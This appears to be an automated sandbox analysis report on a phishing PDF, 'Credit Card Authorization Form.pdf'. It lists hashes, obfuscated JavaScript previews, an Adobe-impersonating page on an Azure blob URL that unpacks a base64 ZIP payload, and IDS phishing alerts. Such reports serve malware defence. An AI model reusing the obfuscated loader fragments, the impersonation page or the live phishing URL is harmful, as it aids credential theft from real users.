                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:ASCII text, with very long lines (65536), with no line terminators
                            Category:dropped
                            Size (bytes):77807
                            Entropy (8bit):5.840527062340211
                            Encrypted:false
                            SSDEEP:384:WZNLZjZUZgZOZZN2ZNBZRZNuZNqZLZSZN1ZZ0ZNLZjZ8ZFZrZJZN/ZpZxZIZPZUw:fTSzpwsta7SuHiHwdcU6AH6xgi
                            MD5:26F75EC4BFB526488AC0693B1B08F0E1
                            SHA1:942E958E026D96227010EF75069A05AF417C4786
                            SHA-256:012781DC588EE679CDEA8F543B56EB1E782CEE442336ED54EC4265142020DA0C
                            SHA-512:2EBD56B8AEDEB99224DC6926F2CFF5A5E0EEB44FE8B6E47C7BC61B5D67CABC6B12166BE47FDA5AB137E7029FBC7EC13C271A321F952DB621E2EFB0B9F2DE14E6
                            Malicious:true
                            Preview:function _ivCbsPAiayncXDfoxGfhNeOaeyJXdRxqBahKcyhtQWMidwJenFRAZBwOfZFHiVUogumVjiCbaHfRwHhcFIYKRTcyVhARIvZwpRIPrjaqpmIzKxWqIROLlSFywRPeQneVrHCHvnMRDSgZbJGjatwKTTsLaRxGmBGjHtNgmVNKMBOVcyzXQAeoXXHHyYTtxAVBddiINtZJbverndWzuENebgOEnbwITmBGJLEOCxUmoAykyFzhPtNOkVQHQVQVXGJajJYetiEDWspaRSsyylFFHKymHefItLefUMjwqcNYSZQPpSwftYPInplzASjtEsHdpKmjpZdIqNeriYCiDLcpIMCAJSxurEVoIJiFUyfRfTPwXCbyAeGkwqoCdNDpvUVbmriOlwgYkbBuUPxMSUZfYJbbiKteayzzAElqCquXUFFITQWxGhzqYSFWBSERjEmerMofNFUMyEeljdblGNBSsbAxEJDZdaLasSontAfHRwgXVCcgdkUS25dc(_ivCbsPAiayncXDfoxGfhNeOaeyJXdRxqBahKcyhtQWMidwJenFRAZBwOfZFHiVUogumVjiCbaHfRwHhcFIYKRTcyVhARIvZwpRIPrjaqpmIzKxWqIROLlSFywRPeQneVrHCHvnMRDSgZbJGjatwKTTsLaRxGmBGjHtNgmVNKMBOVcyzXQAeoXXHHyYTtxAVBddiINtZJbverndWzuENebgOEnbwITmBGJLEOCxUmoAykyFzhPtNOkVQHQVQVXGJajJYetiEDWspaRSsyylFFHKymHefItLefUMjwqcNYSZQPpSwftYPInplzASjtEsHdpKmjpZdIqNeriYCiDLcpIMCAJSxurEVoIJiFUyfRfTPwXCbyAeGkwqoCdNDpvUVbmriOlwgYkbBuUPxMSUZfYJbbiKteayzzAElqCquXUFFITQWxGhzqYSFWBSERjEmerMofNFUMyEeljdblGNBSsbAxEJDZdaLasSon
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:ASCII text, with very long lines (65536), with no line terminators
                            Category:dropped
                            Size (bytes):80379
                            Entropy (8bit):5.829899279256078
                            Encrypted:false
                            SSDEEP:384:A1V2VkcX2XbvBcH1JInta7SuHiBxwiwd1s+++z3DWAH6cMgHC:A1VwkuwbvBcIta7SuHiHwdcU6AH6xgi
                            MD5:70EED7F57219094A9A00181F453F83F1
                            SHA1:3979ADF54D055E8FF0CB8D6E84AEAA92395AF1CF
                            SHA-256:1E8A89684E88C33F6A794EE07498FC698A88D22CD14B35E6BC35F30AB3B5A69C
                            SHA-512:1BFBE5497B4949C5C3840FA3610D9944A7F9A976EECD531391430C900A78EB49E449913EF970A79CB51B6356E9ABFA894929CEF3FB0B35F2DFC17BFB33E5DEA6
                            Malicious:false
                            Preview:function _AVqwQCmohbEMzSuBTwQSmudSjgLHGgcyXMrklIVeqNunkObFlreXXSbCOtCxbFssAtYEAMpBQsEoBjsgThdEaEDFAcrZFsUuwHhjzmNiFtWayfhdzlmwPQiQusVPXCXlqDTNPxWlgEGtBXWGpZpjMhCZjpSQNxijjCAyrcdvpNVCPTVyxjfMSggHYmHVKfPjytWWppkGZrfsCTJsFqAoPVUqekXJNpOFPIGPCjphOqscwkkRGdspqSzbWPfclFQCLKZtrNRePnqTVEckUPEahWdBXRpPWGboTUWfpBdUxjAMXSNdUmJeXRGOKUHzspBQmZyOzgUNbCEPfUsvMBYFnVjcfJyuvHVZflYnqDXvvvlLienqXjcVQETcsXLtlhDUXgmfyHinuQGlgksRCqSDgFHbRgQiJTQADEYsotCDfLEwwcSGVxlwZxhnEOvZHKCSgeYAvwfZfPLkSjwBForKKwIMarhCuDOkBNmoGQjwmPBGzxQxLVwI253d(_AVqwQCmohbEMzSuBTwQSmudSjgLHGgcyXMrklIVeqNunkObFlreXXSbCOtCxbFssAtYEAMpBQsEoBjsgThdEaEDFAcrZFsUuwHhjzmNiFtWayfhdzlmwPQiQusVPXCXlqDTNPxWlgEGtBXWGpZpjMhCZjpSQNxijjCAyrcdvpNVCPTVyxjfMSggHYmHVKfPjytWWppkGZrfsCTJsFqAoPVUqekXJNpOFPIGPCjphOqscwkkRGdspqSzbWPfclFQCLKZtrNRePnqTVEckUPEahWdBXRpPWGboTUWfpBdUxjAMXSNdUmJeXRGOKUHzspBQmZyOzgUNbCEPfUsvMBYFnVjcfJyuvHVZflYnqDXvvvlLienqXjcVQETcsXLtlhDUXgmfyHinuQGlgksRCqSDgFHbRgQiJTQADEYsotCDfLEwwcSGVxlwZxhnEOvZHKCSgeYAvwfZfPLkSjwBForKKwIMarhCuDOkBNmo
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:ASCII text, with very long lines (65536), with no line terminators
                            Category:dropped
                            Size (bytes):77807
                            Entropy (8bit):5.840527062340211
                            Encrypted:false
                            SSDEEP:384:WZNLZjZUZgZOZZN2ZNBZRZNuZNqZLZSZN1ZZ0ZNLZjZ8ZFZrZJZN/ZpZxZIZPZUw:fTSzpwsta7SuHiHwdcU6AH6xgi
                            MD5:26F75EC4BFB526488AC0693B1B08F0E1
                            SHA1:942E958E026D96227010EF75069A05AF417C4786
                            SHA-256:012781DC588EE679CDEA8F543B56EB1E782CEE442336ED54EC4265142020DA0C
                            SHA-512:2EBD56B8AEDEB99224DC6926F2CFF5A5E0EEB44FE8B6E47C7BC61B5D67CABC6B12166BE47FDA5AB137E7029FBC7EC13C271A321F952DB621E2EFB0B9F2DE14E6
                            Malicious:false
                            Preview:function _ivCbsPAiayncXDfoxGfhNeOaeyJXdRxqBahKcyhtQWMidwJenFRAZBwOfZFHiVUogumVjiCbaHfRwHhcFIYKRTcyVhARIvZwpRIPrjaqpmIzKxWqIROLlSFywRPeQneVrHCHvnMRDSgZbJGjatwKTTsLaRxGmBGjHtNgmVNKMBOVcyzXQAeoXXHHyYTtxAVBddiINtZJbverndWzuENebgOEnbwITmBGJLEOCxUmoAykyFzhPtNOkVQHQVQVXGJajJYetiEDWspaRSsyylFFHKymHefItLefUMjwqcNYSZQPpSwftYPInplzASjtEsHdpKmjpZdIqNeriYCiDLcpIMCAJSxurEVoIJiFUyfRfTPwXCbyAeGkwqoCdNDpvUVbmriOlwgYkbBuUPxMSUZfYJbbiKteayzzAElqCquXUFFITQWxGhzqYSFWBSERjEmerMofNFUMyEeljdblGNBSsbAxEJDZdaLasSontAfHRwgXVCcgdkUS25dc(_ivCbsPAiayncXDfoxGfhNeOaeyJXdRxqBahKcyhtQWMidwJenFRAZBwOfZFHiVUogumVjiCbaHfRwHhcFIYKRTcyVhARIvZwpRIPrjaqpmIzKxWqIROLlSFywRPeQneVrHCHvnMRDSgZbJGjatwKTTsLaRxGmBGjHtNgmVNKMBOVcyzXQAeoXXHHyYTtxAVBddiINtZJbverndWzuENebgOEnbwITmBGJLEOCxUmoAykyFzhPtNOkVQHQVQVXGJajJYetiEDWspaRSsyylFFHKymHefItLefUMjwqcNYSZQPpSwftYPInplzASjtEsHdpKmjpZdIqNeriYCiDLcpIMCAJSxurEVoIJiFUyfRfTPwXCbyAeGkwqoCdNDpvUVbmriOlwgYkbBuUPxMSUZfYJbbiKteayzzAElqCquXUFFITQWxGhzqYSFWBSERjEmerMofNFUMyEeljdblGNBSsbAxEJDZdaLasSon
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:ASCII text, with very long lines (65536), with no line terminators
                            Category:dropped
                            Size (bytes):81444
                            Entropy (8bit):5.83181929505132
                            Encrypted:false
                            SSDEEP:1536:HataoaTata8aEararaGaoaQaTaRahataoa1afa4aRaVanaZaiasaxa8ataraJaVq:fpwPVA6H2H+
                            MD5:1304DA56661CC11630D6010F98F0B788
                            SHA1:4687E5F822AA6CF667946C9E23A891C468DA0142
                            SHA-256:704B66B2E06DC7D2D560ACE66DC3959FAD8836200D402A57C645E65CD38E5E59
                            SHA-512:A5A1835F833EA86C4B7CFCF8ABA0311796E123FD860403B84459232775E7699F901847308009552F6A5C2501A310158EBE17CB4DE167D917CAE883F5274979B7
                            Malicious:false
                            Preview:function _FWIpDGzppOrBspvYPLfSFKvvDjhmOHAdblKUeyaLIYBODHeqpqdGNPDcmLrzTsviAnHWNFjWOFeVCwfDuScneZJVAniQfNmDbeLWHdxXNTGgryZBxEFSZjCVDoVMgvGIkjZkzeaCYosdYrjpthvtxyuhTvqXoFxXaChXZqpPXpiRoIDTruQzDVUqwaRTmpnCTbIEjiLmpPJQbqdmidJtbJZuTmezYAMjbwOlArZArFnVcBbdOLUelsrATgmUDxhrpkBMkXShcbkvtdeObmeXHmZbUYPgVkENkJmjDgueODAtcrGpRhfVkkRyzUnILYOIsdXaPCmUQkjYlacNuaLxLWYaFMBxGRUEyhDWingTVKYbGhSCADaytMHkKPmxFeDJelFobdTzZeLIlUvhpSrtklkMbrnDTdFnqdViCQSAsXVNKNFlbfzFuBStMCGyVgIJGsvwUhOYTMhWLFMhDPwJyOEWelWWzXSXzdPbuGWvdNfWtKrhfAJF2519(_FWIpDGzppOrBspvYPLfSFKvvDjhmOHAdblKUeyaLIYBODHeqpqdGNPDcmLrzTsviAnHWNFjWOFeVCwfDuScneZJVAniQfNmDbeLWHdxXNTGgryZBxEFSZjCVDoVMgvGIkjZkzeaCYosdYrjpthvtxyuhTvqXoFxXaChXZqpPXpiRoIDTruQzDVUqwaRTmpnCTbIEjiLmpPJQbqdmidJtbJZuTmezYAMjbwOlArZArFnVcBbdOLUelsrATgmUDxhrpkBMkXShcbkvtdeObmeXHmZbUYPgVkENkJmjDgueODAtcrGpRhfVkkRyzUnILYOIsdXaPCmUQkjYlacNuaLxLWYaFMBxGRUEyhDWingTVKYbGhSCADaytMHkKPmxFeDJelFobdTzZeLIlUvhpSrtklkMbrnDTdFnqdViCQSAsXVNKNFlbfzFuBStMCGyVgIJGsvwUhOYTMhWLFMhDPwJyOEWelWWzXSXzdPb
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:ASCII text, with very long lines (65536), with no line terminators
                            Category:dropped
                            Size (bytes):79324
                            Entropy (8bit):5.831133831803164
                            Encrypted:false
                            SSDEEP:768:Bvz2JOj2oDjMITRedfJeb+Fb/35WJMu+Jc1LZnpqtwx1btnpqSNn+tIn9dEFfRg0:KA6H9AH87
                            MD5:5AEE7D06041E4C840C72499E26D524FE
                            SHA1:4551A6EA35DD455078D12BCC1D9EBDE8CE113AA3
                            SHA-256:41BD3014E370D805F826421D45735A9618E771335B22B27C26DA06F38E6A9F64
                            SHA-512:7559457846CDBC6BC5690A9ACE65D0737B0F0E026C033CF6915CA4001964D37A05D2A1FBF795458CA37A5931771AED70EBBE74A31D7A0772D9823B8C5BEB6428
                            Malicious:false
                            Preview:(function(_lcwcRfSvhPYkHlmxVvwxQBvztYWRTTGIjIGhmiIvvVwpICOBGRHAwJTlaJdNjRUkMrBsfTAMIoYdwUUzTrbWovYlkyVimCNKXyZiWMqOrJQjCpzzJegubgqkxJtRwHiEybuxJUkkvuilQRgecBIJTBXJrTegzxYsJGdaDiFqytwdHCLLMSsKDoQqXDeuKHxUidHsfUjaGMrmsTypCHHrSXMrnUDgUkmtEAqFmEtiWKwaxLLURbyNOsPiDpIdcKUrTBoFOWoxSkBcEvHqdMEOlMsJFflXcwxKvkZAQcgvMfCTyuxGUCqyOSfCcvItXLbWsdXNGXuUeZxaOSROtJaRkPuprnzMpJfiIhfcUexYpYcTiSTbCZACBAhVVoKqTLpJfBmBHcGSrgdxmaCWiBHBSNUKLvfGlRvtNpkDthhIhpnwWwLlYZPQRTDspwMwlPQzcGUaThkUHBqXZAidNsRNzuCQIbTlnGIeToIPuzDugpjdIaVMlXUU4a449a,_lcwcRfSvhPYkHlmxVvwxQBvztYWRTTGIjIGhmiIvvVwpICOBGRHAwJTlaJdNjRUkMrBsfTAMIoYdwUUzTrbWovYlkyVimCNKXyZiWMqOrJQjCpzzJegubgqkxJtRwHiEybuxJUkkvuilQRgecBIJTBXJrTegzxYsJGdaDiFqytwdHCLLMSsKDoQqXDeuKHxUidHsfUjaGMrmsTypCHHrSXMrnUDgUkmtEAqFmEtiWKwaxLLURbyNOsPiDpIdcKUrTBoFOWoxSkBcEvHqdMEOlMsJFflXcwxKvkZAQcgvMfCTyuxGUCqyOSfCcvItXLbWsdXNGXuUeZxaOSROtJaRkPuprnzMpJfiIhfcUexYpYcTiSTbCZACBAhVVoKqTLpJfBmBHcGSrgdxmaCWiBHBSNUKLvfGlRvtNpkDthhIhpnwWwLlYZPQRTDspwMwlPQzcGUaThkUHBqXZAidNsRNzuCQIbTlnGIeT
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:ASCII text, with very long lines (65536), with no line terminators
                            Category:dropped
                            Size (bytes):81444
                            Entropy (8bit):5.83181929505132
                            Encrypted:false
                            SSDEEP:1536:HataoaTata8aEararaGaoaQaTaRahataoa1afa4aRaVanaZaiasaxa8ataraJaVq:fpwPVA6H2H+
                            MD5:1304DA56661CC11630D6010F98F0B788
                            SHA1:4687E5F822AA6CF667946C9E23A891C468DA0142
                            SHA-256:704B66B2E06DC7D2D560ACE66DC3959FAD8836200D402A57C645E65CD38E5E59
                            SHA-512:A5A1835F833EA86C4B7CFCF8ABA0311796E123FD860403B84459232775E7699F901847308009552F6A5C2501A310158EBE17CB4DE167D917CAE883F5274979B7
                            Malicious:false
                            Preview:function _FWIpDGzppOrBspvYPLfSFKvvDjhmOHAdblKUeyaLIYBODHeqpqdGNPDcmLrzTsviAnHWNFjWOFeVCwfDuScneZJVAniQfNmDbeLWHdxXNTGgryZBxEFSZjCVDoVMgvGIkjZkzeaCYosdYrjpthvtxyuhTvqXoFxXaChXZqpPXpiRoIDTruQzDVUqwaRTmpnCTbIEjiLmpPJQbqdmidJtbJZuTmezYAMjbwOlArZArFnVcBbdOLUelsrATgmUDxhrpkBMkXShcbkvtdeObmeXHmZbUYPgVkENkJmjDgueODAtcrGpRhfVkkRyzUnILYOIsdXaPCmUQkjYlacNuaLxLWYaFMBxGRUEyhDWingTVKYbGhSCADaytMHkKPmxFeDJelFobdTzZeLIlUvhpSrtklkMbrnDTdFnqdViCQSAsXVNKNFlbfzFuBStMCGyVgIJGsvwUhOYTMhWLFMhDPwJyOEWelWWzXSXzdPbuGWvdNfWtKrhfAJF2519(_FWIpDGzppOrBspvYPLfSFKvvDjhmOHAdblKUeyaLIYBODHeqpqdGNPDcmLrzTsviAnHWNFjWOFeVCwfDuScneZJVAniQfNmDbeLWHdxXNTGgryZBxEFSZjCVDoVMgvGIkjZkzeaCYosdYrjpthvtxyuhTvqXoFxXaChXZqpPXpiRoIDTruQzDVUqwaRTmpnCTbIEjiLmpPJQbqdmidJtbJZuTmezYAMjbwOlArZArFnVcBbdOLUelsrATgmUDxhrpkBMkXShcbkvtdeObmeXHmZbUYPgVkENkJmjDgueODAtcrGpRhfVkkRyzUnILYOIsdXaPCmUQkjYlacNuaLxLWYaFMBxGRUEyhDWingTVKYbGhSCADaytMHkKPmxFeDJelFobdTzZeLIlUvhpSrtklkMbrnDTdFnqdViCQSAsXVNKNFlbfzFuBStMCGyVgIJGsvwUhOYTMhWLFMhDPwJyOEWelWWzXSXzdPb
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:data
                            Category:downloaded
                            Size (bytes):97630
                            Entropy (8bit):5.429354252249744
                            Encrypted:false
                            SSDEEP:1536:7YwmJxUOuK5LavAojGhgJAVdJRE2z86zTf4W/Ht9Np0P/AK:7OLVjN/X6AK
                            MD5:B5D02B3F0BF3AE026451909419DF07BB
                            SHA1:C96375D50E72B199AA54DE7B9AD908FD5A2DC7BC
                            SHA-256:ACC7E41455A80765B5FD9C7EE1B8078A6D160BBBCA455AEAE854DE65C947D59E
                            SHA-512:5CC55DDBC175A07FCEEF57F3C019D5EC7B9C2F1570B717F6E9757C3F8C0F936E840F1B8667DD4DF1BB0EB6D9A7A267020F7092E593112F9D07D0680E1EF7A0B6
                            Malicious:false
                            URL:https://cdnjs.cloudflare.com/ajax/libs/jszip/3.10.1/jszip.min.js
                            Preview:/*!..JSZip v3.10.1 - A JavaScript class for generating and reading zip files.<http://stuartk.com/jszip>..(c) 2009-2016 Stuart Knightley <stuart [at] stuartk.com>.Dual licenced under the MIT license or GPLv3. See https://raw.github.com/Stuk/jszip/main/LICENSE.markdown...JSZip uses the library pako released under the MIT license :.https://github.com/nodeca/pako/blob/main/LICENSE.*/..!function(e){if("object"==typeof exports&&"undefined"!=typeof module)module.exports=e();else if("function"==typeof define&&define.amd)define([],e);else{("undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:this).JSZip=e()}}(function(){return function s(a,o,h){function u(r,e){if(!o[r]){if(!a[r]){var t="function"==typeof require&&require;if(!e&&t)return t(r,!0);if(l)return l(r,!0);var n=new Error("Cannot find module '"+r+"'");throw n.code="MODULE_NOT_FOUND",n}var i=o[r]={exports:{}};a[r][0].call(i.exports,function(e){var t=a[r][1][e];return u(t||e)},i,i.exports,s,a,o
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:Unicode text, UTF-8 text, with very long lines (63404)
                            Category:downloaded
                            Size (bytes):1534944
                            Entropy (8bit):5.663245327142174
                            Encrypted:false
                            SSDEEP:12288:JNx9byP+jguWWp+4cQgFxZx5+WdV+9FuNKNTVUbBI0jhYL:JNx9byP+jg8s4cQURn9KNTCbBI0A
                            MD5:75412BD2D12A555F74D4691277E1CD4A
                            SHA1:64A777235308A4733B072A917B82DB04A322C9B1
                            SHA-256:2F7B2D2032C370EF269FCD84BDB8FBBD1B9005BDAC62107F22250594E42ED654
                            SHA-512:3786745F4D654E028D2EAC8B15C074C31EA8F56041426119312534362E087EF8C9D6A3EC1CD951E4D86BA5AC0586A68ED321CDBCFEA3A9FDF5E3AD3A66572521
                            Malicious:false
                            URL:https://cdn.jsdelivr.net/npm/javascript-obfuscator/dist/index.browser.js
                            Preview:/*! For license information please see index.browser.js.LICENSE.txt */.!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define([],t):"object"==typeof exports?exports.JavaScriptObfuscator=t():e.JavaScriptObfuscator=t()}(self,(()=>(()=>{var e={3913:(e,t,r)=>{!function(){"use strict";var e,n,i,a,o,s,c,u,l,d,p,f,m,h,g,y,b,S,v,C,A,_,E,N,I,T;function D(e){return Y.Statement.hasOwnProperty(e.type)}o=r(2993),s=r(649),e=o.Syntax,i={"??":(n={Sequence:0,Yield:1,Assignment:1,Conditional:2,ArrowFunction:2,NullishCoalescing:3,LogicalOR:3,LogicalAND:4,BitwiseOR:5,BitwiseXOR:6,BitwiseAND:7,Equality:8,Relational:9,BitwiseSHIFT:10,Additive:11,Multiplicative:12,Exponentiation:13,Await:14,Unary:14,Postfix:15,OptionalChaining:16,Call:17,New:18,TaggedTemplate:19,Member:20,Primary:21}).NullishCoalescing,"||":n.LogicalOR,"&&":n.LogicalAND,"|":n.BitwiseOR,"^":n.BitwiseXOR,"&":n.BitwiseAND,"==":n.Equality,"!=":n.Equality,"===":n.Equality,"
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:Unicode text, UTF-8 text, with very long lines (63404)
                            Category:dropped
                            Size (bytes):1534944
                            Entropy (8bit):5.663245327142174
                            Encrypted:false
                            SSDEEP:12288:JNx9byP+jguWWp+4cQgFxZx5+WdV+9FuNKNTVUbBI0jhYL:JNx9byP+jg8s4cQURn9KNTCbBI0A
                            MD5:75412BD2D12A555F74D4691277E1CD4A
                            SHA1:64A777235308A4733B072A917B82DB04A322C9B1
                            SHA-256:2F7B2D2032C370EF269FCD84BDB8FBBD1B9005BDAC62107F22250594E42ED654
                            SHA-512:3786745F4D654E028D2EAC8B15C074C31EA8F56041426119312534362E087EF8C9D6A3EC1CD951E4D86BA5AC0586A68ED321CDBCFEA3A9FDF5E3AD3A66572521
                            Malicious:false
                            Preview:/*! For license information please see index.browser.js.LICENSE.txt */.!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define([],t):"object"==typeof exports?exports.JavaScriptObfuscator=t():e.JavaScriptObfuscator=t()}(self,(()=>(()=>{var e={3913:(e,t,r)=>{!function(){"use strict";var e,n,i,a,o,s,c,u,l,d,p,f,m,h,g,y,b,S,v,C,A,_,E,N,I,T;function D(e){return Y.Statement.hasOwnProperty(e.type)}o=r(2993),s=r(649),e=o.Syntax,i={"??":(n={Sequence:0,Yield:1,Assignment:1,Conditional:2,ArrowFunction:2,NullishCoalescing:3,LogicalOR:3,LogicalAND:4,BitwiseOR:5,BitwiseXOR:6,BitwiseAND:7,Equality:8,Relational:9,BitwiseSHIFT:10,Additive:11,Multiplicative:12,Exponentiation:13,Await:14,Unary:14,Postfix:15,OptionalChaining:16,Call:17,New:18,TaggedTemplate:19,Member:20,Primary:21}).NullishCoalescing,"||":n.LogicalOR,"&&":n.LogicalAND,"|":n.BitwiseOR,"^":n.BitwiseXOR,"&":n.BitwiseAND,"==":n.Equality,"!=":n.Equality,"===":n.Equality,"
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):97630
                            Entropy (8bit):5.429354252249744
                            Encrypted:false
                            SSDEEP:1536:7YwmJxUOuK5LavAojGhgJAVdJRE2z86zTf4W/Ht9Np0P/AK:7OLVjN/X6AK
                            MD5:B5D02B3F0BF3AE026451909419DF07BB
                            SHA1:C96375D50E72B199AA54DE7B9AD908FD5A2DC7BC
                            SHA-256:ACC7E41455A80765B5FD9C7EE1B8078A6D160BBBCA455AEAE854DE65C947D59E
                            SHA-512:5CC55DDBC175A07FCEEF57F3C019D5EC7B9C2F1570B717F6E9757C3F8C0F936E840F1B8667DD4DF1BB0EB6D9A7A267020F7092E593112F9D07D0680E1EF7A0B6
                            Malicious:false
                            Preview:/*!..JSZip v3.10.1 - A JavaScript class for generating and reading zip files.<http://stuartk.com/jszip>..(c) 2009-2016 Stuart Knightley <stuart [at] stuartk.com>.Dual licenced under the MIT license or GPLv3. See https://raw.github.com/Stuk/jszip/main/LICENSE.markdown...JSZip uses the library pako released under the MIT license :.https://github.com/nodeca/pako/blob/main/LICENSE.*/..!function(e){if("object"==typeof exports&&"undefined"!=typeof module)module.exports=e();else if("function"==typeof define&&define.amd)define([],e);else{("undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:this).JSZip=e()}}(function(){return function s(a,o,h){function u(r,e){if(!o[r]){if(!a[r]){var t="function"==typeof require&&require;if(!e&&t)return t(r,!0);if(l)return l(r,!0);var n=new Error("Cannot find module '"+r+"'");throw n.code="MODULE_NOT_FOUND",n}var i=o[r]={exports:{}};a[r][0].call(i.exports,function(e){var t=a[r][1][e];return u(t||e)},i,i.exports,s,a,o
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:HTML document, ASCII text, with very long lines (7998), with CRLF line terminators
                            Category:downloaded
                            Size (bytes):13222
                            Entropy (8bit):6.149387456295065
                            Encrypted:false
                            SSDEEP:384:4sVukuB7n1xd0yjh9RYjFdxhlzFG8ibWh2CVoqGBkYWt1sn:4sVu3n1xdfh4PxHzFG8ib3CVoqGBkYQW
                            MD5:1C040804C9C0FE0EA9088256E8EB68C7
                            SHA1:49DBCA826CC1559AA190B4F94B535669A621593B
                            SHA-256:0239A0A2D8A78BCCA155DB11C6A6A5A95DDDBC199B0A40985E6380C939F8330F
                            SHA-512:6CFF3D4B94517C6DB3B2C839BEECF27BE3AF23DE1B8145971B7FE99E952E08F88DD3D748B398C45A2D2DEFA2720CEA62058CA430E738E2B6C3253375935218DB
                            Malicious:false
                            URL:https://adobe.blob.core.windows.net/adobe/adobe.html?sp=r&st=2024-12-17T20:58:07Z&se=2025-01-11T04:58:07Z&spr=https&sv=2022-11-02&sr=b&sig=vDeHaevGyq9deO2tRq9D03JLZreACGon6EF%2FhhJQk7s%3D
                            Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title>Adobe Creative Cloud | Creative Apps & Services.</title>...<link rel="icon" href="https://www.adobe.com/content/dam/cc/Adobe_favicon.ico" type="image/x-icon"> For .ico file -->.. <script src="https://cdn.jsdelivr.net/npm/javascript-obfuscator/dist/index.browser.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jszip/3.10.1/jszip.min.js"></script>..</head>..<body>.... <script>.. const base64ZIP = 'UEsDBBQACAAIAEqnkVkAAAAAAAAAAAAAAAASACAAb2JmMTEtMzAgLSBtYWluLmpzdXgLAAEEAAAAAAQAAAAAVVQNAAfc12FnD9hhZ/DXYWeteWlz48aW5feJmP+g6Wh3VQ3tInaSrtGHxEoQBEAsBAnYFR3Y9x0EQDr83ycllVRU2f3i9SIFJfDmdvMi7znnAh+jS+UPaV19/PTH6HYP/47MKIcgxOPHlytAffr4Lw2yCptT8kfxOTZ/SqoQC/zOePjJf+h+/1A04S89WqcP0e8fPocPyq/14A6fhvpj8ZB+7shw2XgPv3xO1PpPOODnYRquRlFc+sGYP2fh8pdffioefg2XYWMM5RUtun8LYpl9/POLjrr/mkYPYXrxm+4r73e/hr9VRfxg+E2d/vpwS
                            File type:PDF document, version 1.5
                            Entropy (8bit):4.913941073921024
                            TrID:
                            • Adobe Portable Document Format (5005/1) 100.00%
                            File name:Credit Card Authorization Form.pdf
                            File size:56'145 bytes
                            MD5:d42718aad08c2e4d04fad3c465e38b12
                            SHA1:39d1a490682830a77267ea8cd6614bb336bf2739
                            SHA256:18a0c02abbe3880010c2863e3d26791771ffd51a8fa8ce6bd895ebebfe02eb5b
                            SHA512:1a127ffe37dbe33d41c5a67f1d18d191ad0eaf4723273ee517c5793ccbc6a367ce4007a05f440eecea33497121b3e7b06c391e2c792194149db9686bfb087e86
                            SSDEEP:384:oOqmEF+mMDc/5555555558F67cdOr9wavSN/Bi36livjuE/7FMngm:REz/555555555+KhGwjCL
                            TLSH:AA432930F3DBEB8A2B8B695D957E3C335B0192D002E90023752F8C5667A8F760A475BD
                            File Content Preview:%PDF-1.5..%......2 0 obj..<</Pages 6 0 R/Names <</JavaScript 5 0 R>>/Type/Catalog/Metadata 33 0 R>>..endobj..8 0 obj..<</Resources <</XObject <</TLFKIIZgXL 13 0 R>>>>/MediaBox[0 0 595 842]/Type/Page/Parent 6 0 R/Contents 12 0 R/Annots[9 0 R 10 0 R 11 0 R]
                            Icon Hash:62cc8caeb29e8ae0

                            General

                            Header:%PDF-1.5
                            Total Entropy:4.913941
                            Total Bytes:56145
                            Stream Entropy:4.803261
                            Stream Bytes:54703
                            Entropy outside Streams:5.381640
                            Bytes outside Streams:1442
                            Number of EOF found:1
                            Bytes after EOF:
                            NameCount
                            obj10
                            endobj10
                            stream8
                            endstream8
                            xref0
                            trailer0
                            startxref1
                            /Page1
                            /Encrypt0
                            /ObjStm1
                            /URI0
                            /JS0
                            /JavaScript1
                            /AA0
                            /OpenAction0
                            /AcroForm0
                            /JBIG2Decode0
                            /RichMedia0
                            /Launch0
                            /EmbeddedFile0

                            Image Streams

                            IDDHASHMD5Preview
                            1807d0d02fc00000007c33f34bfbd0e0cf3d7fecc02480cedb
                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                            2024-12-18T01:01:49.162341+01002026486ET PHISHING DNS Lookup for Possible Common Brand Phishing Hosted on Legitimate Windows Service1192.168.2.16548631.1.1.153UDP
                            2024-12-18T01:01:49.162341+01002026486ET PHISHING DNS Lookup for Possible Common Brand Phishing Hosted on Legitimate Windows Service1192.168.2.16513351.1.1.153UDP
                            2024-12-18T01:03:09.050770+01002026486ET PHISHING DNS Lookup for Possible Common Brand Phishing Hosted on Legitimate Windows Service1192.168.2.16647661.1.1.153UDP
                            2024-12-18T01:03:09.051139+01002026486ET PHISHING DNS Lookup for Possible Common Brand Phishing Hosted on Legitimate Windows Service1192.168.2.16587721.1.1.153UDP
                            TimestampSource PortDest PortSource IPDest IP
                            Dec 18, 2024 01:01:34.994395018 CET49673443192.168.2.16204.79.197.203
                            Dec 18, 2024 01:01:35.296993017 CET49673443192.168.2.16204.79.197.203
                            Dec 18, 2024 01:01:35.903935909 CET49673443192.168.2.16204.79.197.203
                            Dec 18, 2024 01:01:37.103898048 CET49673443192.168.2.16204.79.197.203
                            Dec 18, 2024 01:01:39.508955956 CET49673443192.168.2.16204.79.197.203
                            Dec 18, 2024 01:01:39.607959986 CET4968980192.168.2.16192.229.211.108
                            Dec 18, 2024 01:01:43.150357962 CET49678443192.168.2.1620.189.173.10
                            Dec 18, 2024 01:01:43.450974941 CET49678443192.168.2.1620.189.173.10
                            Dec 18, 2024 01:01:44.051011086 CET49678443192.168.2.1620.189.173.10
                            Dec 18, 2024 01:01:44.321963072 CET49673443192.168.2.16204.79.197.203
                            Dec 18, 2024 01:01:45.256985903 CET49678443192.168.2.1620.189.173.10
